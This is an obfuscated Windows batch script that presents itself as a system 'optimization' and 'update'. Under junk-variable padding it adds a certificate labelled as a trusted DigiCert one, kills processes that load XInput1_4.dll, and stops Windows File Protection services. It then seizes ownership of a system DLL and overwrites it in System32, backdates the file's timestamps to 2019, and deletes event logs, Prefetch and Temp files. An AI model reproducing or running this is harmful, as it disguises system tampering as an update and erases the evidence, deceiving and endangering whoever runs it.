 %PgMKZ% %lYpGfon% %HIAvQD% %yqTzq% %XnPysgyj% %cvTqeqQ% %fOyvc% %ES%$%edAT%c%ZbUPkYNmu%e%Ux%r%ksyIRPWw%t%kHVWJkxC%O%ckJaQcBi%b%MAixTsjkej%j%jmZwHFPc% %xiNzpF%=%vtnkeDEzlF% %OYVj%$%KAm%c%Ph%e%qBwTuWi%r%AIGhRWTA%t%cB%.%vp%S%qqoJ%i%bxGZkawMKb%g%wpR%n%JvZb%e%hJkp%r%slIOZe%C%UXEyqutHb%e%mEyqFaHv%r%xs%t%Ig%i%YQ%f%pVPQKMYuW%i%GRgWi%c%eFhMQjL%a%eOr%t%O%e%iS%;%Xi% %nm%^%NxXh%
 %ZtlgJNvIS% %loc% %lA% %OvPXH% %IDoIaDcXyR% %Zau% %zymC% %xsMtw%$%IJjeQOr%c%trvdr%e%Kr%r%BnATfPtOD%t%EmDLi%O%c%b%PWlcs%j%cpQtiwlhD%.%jY%F%HoeZQEOD%r%azoytkti%i%yvQJMXW%e%VFLJyX%n%Lbo%d%klUlaQbff%l%ZlFBbZX%y%jKOQjrktyY%N%XOPQDRFIY%a%DOOOFAlEL%m%Dtk%e%VHruXmzl% %jlGNZrvgj%=%hlNzeB% %qqS%'%tav%D%A%i%wctQg%g%BbJpAPx%i%NYGXgchLoo%C%THsFOjZll%e%dqC%r%wsa%t%WJhIvpYpQ% %H%T%oubetlIm%r%Ih%u%eeiOZGZ%s%fplVcmUqh%t%dpIAHXhqo%e%CgnhWJO%d%N% %PdmgrzFHG%C%VmnxOrj%e%gybfI%r%mekzdl%t%kxXsJtAuk%i%TaOS%f%ZzVruV%i%HybA%c%Z%a%qdrfoSiPvG%t%lpuN%e%l%'%jPJMNeE%;%MxuYnZyc% %kINk%^%Rl%
 %DVlQldZW% %l% %OPHJ% %BDBpJmOZS% %wrZdpriu% %BFFfBFcc% %R% %k%$%NCJLBdnUZ%s%mfqCqbYQt%t%fuWhgiGhZw%o%X%r%cPX%e%ShpkxQT%.%Aexcrpimn%A%zaMCvEQliW%d%COTyOtUg%d%rNYbw%(%CdmA%$%ZAQOfgEgAY%c%zMZsC%e%YTxX%r%tTfjWejo%t%npLwapHbV%O%gSqVrCDI%b%ocYG%j%dfoovDYYfw%)%En%;%sHNrTDfZ% %KBD%^%cq%
 %gv% %CgctJ% %lQnvCrw% %tYNiouXP% %ubZ% %mJvqtfkJi% %qrSBFVc% %NHrPMW%$%LYcIjUF%s%eeJwCXwjs%t%lOVnJ%o%LAmldInbCh%r%Zz%e%ZI%.%Iu%C%GncCbBhqlG%l%nAdQ%o%hYk%s%pWVDutL%e%veuFktm%(%i%)%ogY%;%Lc% %TLXd%^%lYVGfVIhq%
 %yxVc% %xaXdirileA% %IYX% %MpYmqfU%}%AJKVuR% %BNG%^%neZqlROY%
"%NKqAJdf% %ycWPUQ%>%b%n%TfLBNGHrn%u%lxhcz%l%BJgiQwG% %Ss%2%ss%>%ZlFSfCjp%&%EQZ%1%QusxrGqh%

:: Find and terminate processes using the file
:%pTIyQynEWO%:%OBHc% %urVjj%F%D%i%IK%n%sNupak%d%H% %HLI%a%zoXheaNRKv%n%dovVcFV%d%FIp% %LUU%t%tIXehJFh%e%Oo%r%PH%m%egMzcRh%i%aj%n%pidg%a%kaQISNi%t%qRs%e%oVgTu% %t%p%T%r%IrT%o%LOhPSm%c%Giw%e%zPxG%s%Js%s%weXh%e%yX%s%wex% %A%u%oCMUqCWPJr%s%plwLuY%i%yXWQGP%n%BmTKkmAa%g%TvUjED% %DBd%t%tFSzzLxY%h%HpXeGRQAEF%e%LlJ% %qBigOAYTz%f%hGBIsE%i%pwpssKk%l%gNdZQDvD%e%xNs%
e%hm%c%jwZZkV%h%IBHDjeHqsO%o%XXIbSt% %WCIFs%=%fBnpmeIWh%=%xBiozGfCzD%=%iwQGpGcEq%=%lHallaTq%=%itQZ%=%jzBnbb%=%KWGGqXd%=%a%=%KGomw%=%wULSR%=%ix%=%wPstoN%=%R%=%XbCsvKVsjz%=%ztGlPFYcH%=%TJW%=%cfexOGXio%=%jHTy%=%XocQg%=%jFS%=%PLUbVdpzJ%=%jzwG%=%lkAoOBRG%=%b%=%B%=%LJcCot%=%FckDHDoUE%=%IrAmeTpPa%=%ezdaOEbWwk%=%vbA%=%xak%=%khJUHVRiK%
echo WARNING: Terminating processes for optimization...
e%vCUPB%c%y%h%ETBEeUy%o%Br% %qonEXvZIte%W%l%A%yAWSpA%R%c%N%LGck%I%QoTjcE%N%vSPX%G%xvjoehXF%:%hxc% %xGcpqke%T%hj%e%z%r%Dw%m%LDXjhzfv%i%TdAkG%n%jiGaB%a%CMMxZ%t%ttMVBCxr%i%vykRqmV%n%cAAjTZb%g%yJIdQYNoHx% %Yp%p%dx%r%ZQdZB%o%pCWlF%c%RqvUItRxhC%e%ORrEgBWjhP%s%GHGewZFdX%s%JAE%e%vDlcpRtM%s%lmcJJ% %RifqWoYCnW%f%WNkvA%o%WfuvaM%r%tc% %kksGUP%o%oLidjOu%p%FgOsImbDr%t%hvGs%i%sr%m%hsQuWEYOHI%i%YUDdk%z%myXlb%a%MEoNxjDwd%t%ZqlLJQPV%i%QiB%o%PsyzcewOrp%n%eKz%.%wVjIYnsMZ%.%KGntZxcb%.%soBGbhB%
e%YZ%c%VlNRO%h%cMM%o%xg% %qcybSC%=%JC%=%UtZNw%=%xX%=%HUzLyMDRZ%=%LIrH%=%nVjeDsSNi%=%fhvtTLr%=%GBZRkjvC%=%bZJ%=%b%=%J%=%U%=%yPdDYY%=%C%=%dzjXq%=%zDDuf%=%J%=%XcfTkCSjKh%=%OZrV%=%GyXQCtUlB%=%zgMGy%=%UaXXTf%=%wFM%=%AIyYleNSzB%=%BRvHTRNGWQ%=%JLkpVnbFE%=%H%=%dOtkQHi%=%w%=%LcYXQZMZMw%=%MfHCWHC%=%IBxgYDB%
f%bWjW%o%phqbP%r%SvUsKIl% %nTAJgDHisK%/%XXnnk%f%EWOsqlaYMA% %yTEvm%"%wslxqGs%t%fCXi%o%fUIPcvXlgK%k%pVcvNod%e%rfA%n%Rv%s%eFqZS%=%gQq%2%PXZaNxXm% %pIPNdLNP%d%gkd%e%eetpH%l%gsWzRqqS%i%MnyL%m%Pd%s%fRnYfrPTu%=%pCyF%,%YpVWEnTQXM%"%DWoCU% %N%%%a%ovyUgkt% %cn%i%AFkOsY%n%nZNg% %uFE%(%DoeUlEnuCm%'%kyFuUlYgYp%p%RsascXGaZ%o%BR%w%cgjH%e%RuggoXs%r%zJuVGCo%s%lVskBFpQ%h%WtsMwDg%e%rKcY%l%xhULPLl%l%k% %QCyzHLas%-%oIYscWHHK%c%lJVDXcnex%o%RjuDR%m%EbguotKlg%m%HXRVpMly%a%nlCYTXYlZ%n%YMDGtHr%d%JL% %Z%"%yKoh%$%OhSwM%P%rCemW%r%en%o%xPTtURzw%c%SkWyfNf%e%u%s%xpH%s%IpgozsImJ%e%UaQsr%s%cbxvSyB% %ghD%=%XZqjGBDV% %Z%G%lVB%e%BUFTZEwCrx%t%psiupS%-%YUnwPl%P%cDgMS%r%BGXT%o%rciUPszd%c%QjJKPyOO%e%tWwwSlix%s%iVorqv%s%QHGLknl% %TZSXsRLf%|%MXxdIriGo% %yDT%W%LWN%h%vh%e%K%r%DNnOQAy%e%lArykeYfRE%-%BhrLL%O%easkeBgFZF%b%cgdwY%j%APleWiw%e%NaslOYO%c%d%t%AiVx% %m%{%CTQAf%(%zD%$%RFaDutnmi%_%lfPFbq%.%pzh%M%QS%o%einS%d%w%u%EtT%l%SA%e%MFfpceVMs%s%FYq% %TwUkBVuIGR%|%t% %MtaZz%W%BVDYCdaLOU%h%elNYaCJV%e%llky%r%CYFeyzDy%e%IGGEI%-%aREDQSZZMm%O%kiMWOsKrm%b%YdtLskFMP%j%UtSpCe%e%cO%c%oTnvQFnFO%t%szcybt% %pHXkXh%{%QjfD%$%JKVw%_%OlvAysip%.%xfD%F%OqGxWcYD%i%zEjHtMIen%l%BWqF%e%QQRz%N%llgFEYz%a%WQhYDmeFtb%m%IhJrZths%e%bip% %j%-%b%m%qxFEZrC%a%KfvCeQcGY%t%VZ%c%Di%h%tSCgS% %AmNTcnyl%'%dLBd%X%ugAJCIYg%I%jpzXKgVcPy%n%xQO%p%ALPSNyqgL%u%NfKbYr%t%ijfkjqnY%1%lfDWLWvE%_%IzasjxZv%4%oGqNFpzxjd%.%L%d%uiiwiTJXA%l%HqS%l%ZwCMViwuqm%'%avLNviJLvG%}%sZnH%)%MCQU%}%vKgGVkXu% %vAlMAorB%|%hLhBFKDtG% %JMvV%S%aynHMG%e%Y%l%jV%e%angjRymR%c%f%t%bxWmswpcK%-%orQCLOy%O%ITsW%b%AF%j%jIsKPofXVZ%e%g%c%PdYeC%t%TepcBGXiYl% %JxSuYUxh%-%vl%E%M%x%aDjkid%p%NoCJIYxAC%a%Sqp%n%ZiccPssWF%d%ebpsSyS%P%tpapFFg%r%x%o%r%p%tFdDqNCVtQ%e%IXFdvHJXMi%r%kLkVCA%t%pWKBBDV%y%sbEmZ% %gKtEQjED%I%vYSfXBMZ%d%WLJJcmfXeL%;%iWBOOCAT% %Remtif%$%xPnUTdrdEE%P%no%r%yiQiAfLm%o%k%c%wN%e%XMl%s%qZIKldNov%s%qtXMHQLt%e%bMJQklByg%s%IRZ% %TjbOLkMP%-%BvNeHnRW%j%Aawx%o%uC%i%czme%n%o% %NujYIN%'%nm%,%m%'%NLHwQ%"%tdNToEAg%'%x%)%sFuzyK% %zpCCjpUmN%d%ulD%o%kntJJE% %fKSHfCLh%(%IYPbyDvEdO%
    echo KILLING: Process ID %%a
 %DS% %Nl% %BIOZ% %RxG%e%kPRcrHLdkU%c%EbyawTWGf%h%flBAbspFQ%o%BkbENIAAd% %CxxhxNrh%K%AzBfUPp%I%t%L%VfbaHV%L%uwfpfrH%I%zOgoVu%N%Lp%G%wTXQEHTF%:%jWiaomEsA% %YREJWzWOKk%P%eRlaTv%r%jyayNID%o%QMxBeT%c%bU%e%pxL%s%ZrpyFCaYTu%s%UA% %g%I%puSFdI%D%Hzb% %Nx%%%a%XvwshoPF%
 %XEzyODlK% %tGUL% %qG% %sCLjBymnNE%t%uYLsxH%a%qhgcRGMLf%s%evwh%k%YEANpo%k%bdhZ%i%oFWo%l%yLIxbZ%l%SwgCiL% %EpZhYA%/%AauNNwMtzV%P%bBMYzRIztT%I%HuA%D%BYZDAYSxZ% %fiaQERdTd%%%a%DofbLAIRSZ% %lCc%/%oNNHnvlAvi%F%cafSV%
)%Of%

:: Stop Windows File Protection temporarily
:%iOeONfT%:%HGssashkQ% %a%S%FIOzcj%t%DcjLeQN%o%thb%p%sewbHKrT% %OQGlMTiH%W%KsjMkSX%i%aRDJIQn%n%dZT%d%TgPdYrHNgY%o%R%w%HAJ%s%BkcE% %iNL%F%FcJpVz%i%wv%l%aLdgJ%e%dV% %UYewYkky%P%KoAtAWlgG%r%rercya%o%mOT%t%kB%e%YnMWVEG%c%GgoRPV%t%zLqZ%i%DnSMbZN%o%HPxZYQpPVE%n%Npi% %VqCdDDkrkU%t%FLP%e%MBlc%m%EAVzXpk%p%ODzzpmlpw%o%ZgDzh%r%c%a%Jw%r%WAZgSjQ%i%nYrh%l%BFe%y%gsOFa%
n%jua%e%jHtPHP%t%BFBDTn% %vkYaGIig%s%cf%t%hAx%o%s%p%kf% %geErk%w%dpfK%u%nEptLeCac%a%RO%u%fou%s%WFSKgS%e%XVKR%r%LKxd%v%LYVu% %IDW%>%NfZarido%n%BHEqJmC%u%Hif%l%GRo% %elsYyfNxdm%2%rObeu%>%fzJk%&%gwuGYm%1%kbR%
n%xPJ%e%qGRlQdAA%t%VbQU% %kFpIdTnhY%s%ReG%t%cf%o%wa%p%DG% %RJDHOvP%t%ZOz%r%PwZaKX%u%hNe%s%Jgff%t%JeVOxTOUlm%e%pwKRxz%d%D%i%ysgyOV%n%L%s%Ft%t%UztXKXQY%a%rn%l%CTW%l%lMDjFl%e%GvndERvqCw%r%TBb% %xsSMCkEHR%>%vhmOLY%n%Gd%u%VIeUNuk%l%D% %THobSLBWO%2%F%>%kFcKzlKFnj%&%jN%1%HTKudsdy%

:: Take ownership and modify permissions
:%jDMJJym%:%uisZXN% %zlNXkZMUdO%T%DcjTTgxU%a%SJemoY%k%puzmfKsub%e%WVegGjhu% %gzEs%o%Eisl%w%QzMp%n%atCRgEbG%e%wIWXdQY%r%czOOmKfz%s%UVLEEdRG%h%jSy%i%gCQAksB%p%KHELVB% %RigEhum%a%ehnVdmDICR%n%HrojfYs%d%iXOQa% %MncrezjkhR%m%VpVI%o%VhbdZ%d%mc%i%jgFyMIzDhc%f%FxsWIOf%y%yUb% %Tdb%p%wwVAqy%e%sIc%r%DJpLjN%m%n%i%MzmAstar%s%pRwzsC%s%IAy%i%khrwWQcF%o%FYZQVLph%n%qxUeOr%s%mWGk%
i%SjttKSkJ%f%L% %pPFd%e%nl%x%FzvSOlG%i%LCDhgt%s%FzA%t%yZdAJ% %KrBARjqOJB%"%bnuPgeVH%%system_dll_path%"%mafPcZeAOj% %yvquXL%(%v%
 %evBVWy% %ErS% %TBKNfz% %B%t%WcBxoDzthZ%a%Dg%k%axHcFt%e%QmMa%o%vGbu%w%k%n%Bzmxnt% %xwLiyuLdL%/%nQviQK%f%kpmiZUQjP% %PXD%"%G%%system_dll_path%"%kBF% %bj%/%GjyQ%a%MlHtHNpCG% %qsXbgQ%>%kznruXjE%n%sN%u%kfX%l%VCsq% %SxtpO%2%bmjvfy%>%WZ%&%X%1%MEPMPunAtl%
    icacls "%system_dll_path%" /grant Administrators:F /t /c /l >nul 2>&1
 %TrTzwPwMyW% %nAuJ% %LiQUQx% %llYujoVIW%i%EQFhEJOG%c%iviTkvozTE%a%wCaMU%c%KEbV%l%GdDWDamvf%s%zzIhewpgW% %qGgnOQoCt%"%B%%system_dll_path%"%WbDq% %SPRCYY%/%bWEOnzfiZc%g%DNU%r%wrYgeDQvFQ%a%s%n%BmOyrqU%t%ivewY% %OUfBNkwX%A%cuR%d%QmXSDcTZD%m%xemoFanSk%i%Q%n%DHMnwWRvng%i%Mzujer%s%sNQIu%t%n%r%tntuRaXF%a%mDPYUZH%t%XaLtTdaaG%o%j%r%WH%s%nCHgsIq%:%ho%F%rJmqzUdI% %KtvXRmS%/%dCUHIyudgG%t%faY% %WQWgZAZKj%/%XP%c%FRnu% %gJJMfGRF%/%rYwjIBLEhp%l%ZM% %OFNPCxp%>%l%n%OUW%u%Bko%l%CCRWuld% %KF%2%JEm%>%NDZqwrG%&%EGzAR%1%rIjNr%
)%bZKRQEt%

:: Copy new file to System32
:%edOjTHAyI%:%UzWCZZWdKK% %uV%C%aNNGuVkjJ%o%DRb%p%SkoCGq%y%oZhGAlceV% %YTZLSk%n%nYtx%e%Kl%w%VY% %UNvABtL%f%aRJrNMRHqI%i%ymZse%l%Vf%e%j% %onYqxTAL%t%tnBhdmboF%o%U% %LgmKsgt%S%u%y%MQcoP%s%TdKsQXCM%t%gbXsyQcThQ%e%lHs%m%hY%3%KBGMa%2%SWqaJBVJt%
c%MeWCzIK%o%vA%p%esPTROZf%y%QR% %jLGtx%/%mciNIeFq%y%GiVtuWXBV% %PiW%"%RMAnRIxUo%%dll_path%"%UxAqe% %XxcvDZkq%"%gFFAXOp%%system_dll_path%"%HfYv%
i%W%f%WaVus% %fhAgC%%errorlevel% %Xp%n%hRAcIMLKZ%e%yM%q%m% %Asrw%0%dakPk% %C%(%gURI%
    echo ERROR: Failed to apply the update! Try running in Safe Mode.
 %gYkssKQCeg% %wzlNzp% %rViOpT% %JNWKsyNa%e%YXNclyj%c%oWvOqilkKt%h%dp%o%pOiy% %mmxdh%E%zKtQJt%R%apxjXvBW%R%VbGdw%O%BpMObB%R%tnLAmnxA%:%miJNDaH% %t%F%enYllJ%a%DqrT%i%HXHduRFvE%l%QhQNJe%e%xxgjfNqZS%d%iH% %jLYZ%t%ErEVJ%o%EtnbWLSg% %BfGVyJeO%a%ymFFicbxE%p%yj%p%D%l%Nq%y%Fsq% %lVLlqJvp%t%zvbGIWEMc%h%BRDYakn%e%tYTc% %cWvkcwzKbF%u%NeECzlSiK%p%FT%d%bVN%a%AvnsAHFRgv%t%ZMX%e%mJ%!%uX% %TuKKZKozz%T%nD%r%oJcfJ%y%sLHI% %wLnUxcLFuQ%r%H%u%bzEN%n%VpnNwBqhEG%n%YRPL%i%Ng%n%cpdO%g%rT% %rNtULwHh%i%jQHWcwmAJ%n%Qe% %HGqRBux%S%VJGeWFH%a%wBG%f%dBk%e%SijjQoR% %dTgwJAOfK%M%CnmYuQzwf%o%MeXvaeMW%d%plqkyXVX%e%ThR%.%RMNiDM%
 %JJBjrbYGh% %ThsWNQg% %LTODsyrQ% %yaesidDKg%p%vIID%a%x%u%fJvJ%s%aNczZYwUoU%e%P%
 %HodYItkNj% %gkR% %q% %wqdpHfY%e%RLumggxf%x%oEEAWB%i%BPQWtt%t%EkweYI% %CG%/%g%b%S%
)%WZAgyHT%
echo SUCCESS: Update applied successfully!
e%z%c%nOlPkICkoj%h%FsWfM%o%r% %QHEqihC%S%nSMJzuY%U%H%C%YbBxRG%C%ENL%E%WHyU%S%gHeutzxuhW%S%bG%:%YlaGmWRjvc% %Tjry%U%GRViSb%p%KTTgRHd%d%C%a%ONMMiSezL%t%Ngy%e%xDrq% %DXiQbUW%a%yHp%p%JiOm%p%kNVt%l%Fz%i%oT%e%b%d%hK% %aGGpPllrgw%s%GRJC%u%WxIfNdBUjn%c%YhvobJ%c%McQb%e%EYDRU%s%r%s%EBbVAKaJ%f%N%u%seDeqKX%l%CdeasXagRq%l%ktU%y%Y%!%uNAcoCPeq%

:: Modify HDN DLL Timestamp
:%GNt%:%nGem% %YfbMdHQW%M%HTIFTmh%o%E%d%MlExAQxzkz%i%Tsiv%f%PiM%y%RGitC% %IU%H%lOGq%D%sjqo%N%CZPAPugeMA% %NZ%D%f%L%bKJiM%L%ohO% %ZLQZlh%T%BfXfirj%i%hNcQycsU%m%blfumGTFI%e%azHIYILpk%s%vPam%t%Xuvsgert%a%qs%m%qTdzRV%p%Vki%
powershell -Command "(Get-Item '%system_dll_path%').CreationTime  = '2019-12-06 12:49:00'"
p%GTPOoxwwHi%o%mm%w%cTS%e%DYD%r%UlTJKAP%s%JwejEO%h%fnoTQGX%e%rr%l%gmW%l%WPmLvDaD% %AtNZa%-%EWAkprdz%C%mxjjJtrH%o%fdNHKycfZ%m%Cth%m%RPOTEWlKe%a%NlAswANryz%n%kvQQpbooMq%d%L% %HjNLE%"%HqlTWvf%(%tpLgXhV%G%LQuSyKZpPA%e%qpBUDxY%t%nBBVX%-%UXYEKmQ%I%rnzyWX%t%qcjlN%e%QAJ%m%sL% %E%'%z%%system_dll_path%'%rNBgSJscja%)%nCuYM%.%LCJmGeOcgg%C%glhA%r%WCwzpaeAF%e%wTQNoDG%a%ZmtcSgpE%t%adRY%i%pBPaS%o%qFAtiGr%n%HQXMhU%T%qNqdfRgTz%i%SbuzdGtGd%m%bkIGE%e%TjaCnvDKQ% %pIVzBegzt% %nUbwg%=%ujt% %JcSATu%'%x%2%M%0%R%1%zEcTkAWF%9%Cs%-%WtLBNUteiy%1%UvorGkC%2%LAagHn%-%RtPDJqu%0%wNXxrRNd%6%SD% %smrd%1%UZLLxEdR%2%jGZEq%:%UmZLNg%4%xpkah%9%iRtXz%:%JeFPRic%0%xkuEVa%0%iAI%'%HwsUUjl%"%BDPartJL%
powershell -Command "(Get-Item '%system_dll_path%').LastAccessTime = '2019-12-06 12:49:00'"
p%Td%o%icAIB%w%ObgoZTTNI%e%vIa%r%Yq%s%s%h%OGIxs%e%TwWm%l%ocbcW%l%LwhFHjhPWk% %OGsL%-%GmL%C%NrAHdh%o%sQP%m%N%m%TA%a%w%n%saHePhnQsf%d%a% %BSrcpuyD%"%aDYfyHwETm%(%klaZUgBwD%G%JXpejaPP%e%QTrElkqXn%t%i%-%wAlNFh%I%WA%t%q%e%h%m%KthZHWABSz% %pQlETSMdxp%'%o%%system_dll_path%'%JEKizav%)%FjYkMV%.%GvfW%L%iKDJhhVII%a%qbHh%s%WywjvwF%t%yBguOEbT%A%WRYlErsVX%c%zOc%c%LVpFFy%e%gvNUSw%s%GYoEO%s%MNMSQ%T%gVBsHQB%i%VveMyf%m%TnQwUSN%e%PBzOtCkcw% %nWDgg%=%T% %OgUQvGgx%'%BDMtnH%2%hmfJEA%0%wXqruBTsd%1%L%9%MfeSNBaa%-%HgRka%1%QKgStq%2%bYoQxCu%-%MkV%0%tgnpmFjld%6%Kzq% %X%1%xcEtb%2%B%:%ZZumBqy%4%u%9%MvnoZpF%:%PGhRuHqa%0%oyA%0%VS%'%ijU%"%inTqTBTnPU%
powershell -Command "(Get-Item '%system_dll_path%').LastWriteTime  = '2019-12-06 12:49:00'"
p%QGyKNgddRc%o%JgyJiowhus%w%NshtPYpT%e%DMK%r%WzC%s%ytGPKZ%h%UqdyZo%e%peZrn%l%AMBFJMk%l%m% %ZNIOMBsj%-%fdz%C%fg%o%mBIQcupLG%m%EVsvaLc%m%oVXIJX%a%RQccG%n%x%d%wduNnT% %OzzfXRcw%"%VjkaiOXBIW%(%D%G%VjkR%e%ifpLWq%t%ERAffh%-%KzxKs%I%DN%t%igVPKJVbt%e%tmY%m%aaKNlV% %nCFfuRv%'%NisoJKYBLv%%system_dll_path%'%CsLaWgAKRf%)%iqNKdm%.%YuZPJwa%L%CDgDN%a%IJ%s%sgICwn%t%jfSfeybBxz%W%kNDsVbcfx%r%ecTgONtKje%i%nAhxrN%t%jJhkirlL%e%hEjhpbh%T%xXtf%i%GWpOnqdzRI%m%x%e%KmUKxwbH% %tDUvdTts% %c%=%LwHrykSJ% %mrSwJ%'%klCreFGWd%2%F%0%eV%1%TlGZgTe%9%I%-%VpEvTIvYHY%1%EcBASAg%2%aAPUiAvcKf%-%ncK%0%FyifhnxUG%6%GqrzRhJe% %sOoRZ%1%f%2%mlixFdyuXl%:%oeDV%4%moVBmXg%9%IOWrxtOhV%:%ikMjjiJc%0%zkYPVq%0%AOXCMUMw%'%IhklZUYjw%"%aUV%

:: Restart stopped services
:%Xgaymk%:%QkkKYF% %y%R%UgfvwdwUnR%e%DApp%s%ESdYnmnRlE%t%YRZkPYQPR%a%qIKbMuI%r%I%t%VpsJqYw% %dzKmVjaG%s%kPjuKDDn%t%QMYXEJ%o%ojJnwIYSQ%p%ZBY%p%NsdFP%e%CIn%d%cnuqBHhWUp% %msKH%s%uUTm%e%kHwuA%r%kzIhatqRA%v%evPNyl%i%icrVl%c%VZDF%e%aAkLf%s%nYDzGx%
n%kVf%e%BxVQZ%t%vZLs% %pEUL%s%SqVmnz%t%bhwIiEn%a%FTIRlE%r%hktHImG%t%iajqkld% %eyEatAqRto%w%eHkGqk%u%LeusHFZcr%a%df%u%uORw%s%RVNuV%e%PQiRblCldC%r%mjtNPKI%v%iWrPzfmWd% %ww%>%XKRMhzB%n%NEzBEe%u%qYogwP%l%fX% %BD%2%kKt%>%xQfHeW%&%e%1%VfFyXN%
n%x%e%JmOix%t%vDUfZPwFgb% %tP%s%ZAQgeitRB%t%US%a%ksPAr%r%XLCnBBBa%t%CiaLoOKXPN% %fYI%t%B%r%VeKrg%u%dd%s%b%t%WTkwWjg%e%aIg%d%PoV%i%dNoPAyo%n%QAVDrJaw%s%coyzJGHnbr%t%gyHnhMDnO%a%cUjdy%l%zXpCO%l%yUAJc%e%cFFrhvE%r%UpTPvty% %MBn%>%rWHs%n%gtl%u%Bn%l%Wb% %XZWOUx%2%vskqiaCZgk%>%Imdf%&%T%1%PAcE%

:: Clear all logs after optimization
:%GVCAaGwcKZ%:%YVoBHGzSs% %rKPfxoeQ%C%EjXwkXbss%l%tvTRe%e%gwojqwdlmz%a%UnXtbhQy%r%gArO% %hVCGoSSyy%a%viVnLnXNgS%l%N%l%dCVCzSO% %L%l%EbhwRvXt%o%YKXbmfp%g%mNfvRLTDhc%s%lNNu% %bMuiA%a%EQWRAstn%f%eqeyTAt%t%uR%e%bomG%r%ftM% %TS%o%sTA%p%DraOm%t%lIYd%i%VSgjhIAE%m%Wr%i%mUiFvVzTs%z%UClyet%a%CsnoU%t%fZbEHT%i%sW%o%mf%n%im%
e%s%c%MiAhED%h%az%o%C% %gdquTQdTc%=%aV%=%AKu%=%UuK%=%ghRABgidO%=%rWknO%=%ppSJ%=%YfUU%=%mIPJlb%=%f%=%fIqybaUld%=%BwsQLOFIV%=%nt%=%IKlAJVNiEI%=%pFvO%=%oHeTHybRE%=%YyU%=%ADvoySt%=%PbpzjzT%=%jzodZ%=%WDDYbgjxyW%=%ouAeyxhmK%=%f%=%ykiHGh%=%RiTGNDt%=%d%=%umP%=%QHya%=%uUxo%=%h%=%Tysbo%=%jpQ%=%Xk%
e%GdhtqLXAL%c%uceK%h%VpVBMq%o%NFFlCQraG% %EvJm%C%Aefw%l%lpT%e%CX%a%JH%r%QHyAaASzwU%i%VnK%n%OvVRbUfsTE%g%CvJO% %F%l%ENKXYcN%o%ghrcuul%g%tA%s%fwdOnlE% %W%a%udMUBpnCv%f%oEA%t%b%e%fkambDmQ%r%kpmvk% %Hi%o%To%p%WS%t%GOFV%i%iaYQJa%m%PonHe%i%C%z%IHsrEkV%a%bDzUbj%t%sBcejKM%i%iPzjdsvUNx%o%MMxCzZv%n%q%.%IDHLA%.%Cmb%.%NJJPPewY%
e%CD%c%jvSnsWcoPt%h%lcFD%o%YUlivHHqJ% %AJKnI%=%spd%=%cuUpKSc%=%qCWMKJS%=%TGj%=%YhznCg%=%lwnXhKf%=%emDfv%=%oiM%=%lJY%=%ffefS%=%OIX%=%LOkcqig%=%cXrShcwWl%=%jsitpoRhr%=%ZwIUtmuGZ%=%YMNfOkd%=%PFGrlI%=%K%=%cLGGnBBn%=%hG%=%l%=%KNXmQdof%=%iMMv%=%WmiZC%=%wFywUvZ%=%hoQlxJMq%=%NRBPAQ%=%iZHkZtuq%=%xAgCcB%=%pWTiiLGP%=%VG%=%QvDRC%
d%Wgyth%e%NWTsADEc%l%rO% %cOdUKChI%/%RRzEsGHvey%s%A% %cIdAg%/%j%f%rmuprYa% %G%/%JyRTouNOIA%q%TTL% %TJWnSbztA%"%QfUYwvO%%WinDir%\%zoAyKa%L%X%o%nHpqpvVql%g%Nlk%s%SJPh%\%bpEEniRxh%*%HjJxFwxuPk%"%X% %cDnAzyNbO%>%qubonvevH%n%VWu%u%Bej%l%ynbVPPt% %ow%2%aZQouPSoP%>%jrGkD%&%NEY%1%LtiUhAeT%
d%OChOGUbHL%e%Dg%l%K% %FWahCBoOqA%/%ELdLKmRQ%s%kDa% %peI%/%XkCT%f%FMB% %CEDmGOsw%/%nujsImiQVH%q%UzkZRZrfQf% %I%"%ozjieJJCv%%SystemRoot%\%KFYvN%S%qYkizz%y%xzruJWuSD%s%wta%t%eu%e%Ojh%m%nUcO%3%IlSqzi%2%Odf%\%YgKiFp%w%tuR%i%d%n%VIo%e%vAz%v%kdk%t%ulyJrAz%\%U%L%zrYe%o%BDJMT%g%LFKgQnJdSk%s%tvCTyv%\%cUX%*%tgyUY%"%vpNQNo% %FaGiCUs%>%nrDkF%n%DVWu%u%OjX%l%mqLy% %BghwnX%2%cjtiuJkzXZ%>%ekqNOikmev%&%AbXVBTYTL%1%DPoZ%
d%SXw%e%tZyMH%l%R% %oYpDhRsi%/%ptqwBHnwOg%s%mTKoXymT% %RAEKA%/%NEZJo%f%IYf% %hUVoEHnC%/%HM%q%m% %avSAhXvqYB%"%wGjwE%%LocalAppData%\%vdKsMIDGna%T%GfiFBkFeI%e%JaA%m%laIyQcGkos%p%vWjZOTeD%\%F%*%HiMTjoZgpi%"%KzxWd% %fmOF%>%d%n%WnqUm%u%puTgG%l%LXP% %LC%2%RbwhR%>%LoBehVD%&%uHAlfRYl%1%zFzPMKRNyA%
d%GJpuCzkH%e%BNTAlOb%l%ypk% %vpoA%/%LbskCtYuaP%s%ZuDSTuGSr% %QxJ%/%acCrwK%f%U% %Yb%/%VxKxggJg%q%hI% %OlIfYvMn%"%gSrwTu%%Temp%\%pJobrPfvb%*%Qez%"%meW% %DWheSIgN%>%Oy%n%ADLaPYqx%u%HwHQaA%l%JmB% %zU%2%IglLGS%>%UiXsQbsPY%&%olJQcl%1%ATMxYiahBA%
d%JpNPLwwkty%e%qzGjYRE%l%AEJKee% %jtmF%/%HG%s%uWo% %U%/%ASgAG%f%Qmy% %zzRqSE%/%OHzWJ%q%gLMZh% %p%"%aaIAkq%%WinDir%\%wQj%T%YyJwm%e%kaP%m%RPc%p%gHnh%\%gghqWdnaw%*%UewHtfI%"%R% %jUQaIPRkZm%>%fiVDvvU%n%HOM%u%bPTXMWzaZy%l%oX% %iGRRHGUpH%2%FvDPqipyOi%>%tHBHeBZahI%&%bwdw%1%IYM%
d%lMLZflW%e%WpARBrdl%l%HY% %JfKx%/%jgSAPDjSae%s%qjjCB% %UcGu%/%lwctuc%f%PPCToOI% %zwgtrtenUk%/%oCRhPuGY%q%L% %HVFaIbK%"%SdDd%%SystemRoot%\%ZObUtwUVa%P%DREVBctqmw%r%ZGJbYJlc%e%KZxnL%f%jEaMScr%e%ZaSMQBsV%t%YvsVvj%c%qjvfoA%h%GVFGcvSg%\%NcNqERPL%*%TJsaS%"%QKUUN% %lnx%>%TMvET%n%VvUKODHGJA%u%gLwJT%l%ftRt% %GmnDezcXyv%2%C%>%ydp%&%HRmiljrArT%1%vz%
